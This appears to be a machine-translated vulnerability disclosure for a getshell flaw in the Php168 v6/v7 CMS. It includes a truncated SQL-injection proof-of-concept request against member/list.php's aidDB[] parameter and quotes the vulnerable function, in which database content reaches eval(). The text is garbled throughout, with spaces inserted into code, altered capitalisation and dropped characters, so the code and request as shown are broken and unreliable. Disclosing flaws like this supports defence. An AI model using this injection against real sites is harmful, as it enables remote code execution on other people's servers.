Php168 v6 ~ Getshell security issues in v7
It is a little tasteless and requires the following conditions:
1. Website configuration: true or static file generation
2. Allow registered members
The testing code of v6 is provided. After submission, phpinfo () is executed. The v7 principle is the same, but the number of database fields is different.
Member/list. php? Step = 2 & Type = delete & aidDB [] =-1) % 20 union % 20 select %,
Vulnerability in www.2cto.com make_more_article_html function:
Function make_more_article_html ($ comebackurl = '/', $ type = '', $ aidDB = ''){
Global $ db, $ pre, $ webdb, $ webdb, $ showHtml_Type;
If ($ webdb [NewsMakeHtml]! = 1 | $ aidDB = '') // $ webdb [NewsMakeHtml] is static
{Return ;}
...
$ Query = $ db-> query ("select. *, B. bencandy_html, B. list_html, D. aid FROM {$ pre} article_db d left join {$ pre} article a on d. aid =. aid left join {$ pre} sort B ON. fid = B. fid where d. aid IN ($ string )");
While ($ rs = $ db-> fetch_array ($ query )){
...
$ Filename_ B = $ rs [bencandy_html];
...
Eval ("\ $ showurl = \" $ filename_ B \";");
...
The vulnerability function is called in \ member \ list. php:
If ($ step = 2 ){
...
If ($ Type = 'delete '){
Make_more_article_html ("$ FROMURL", "del_0", $ aidDB );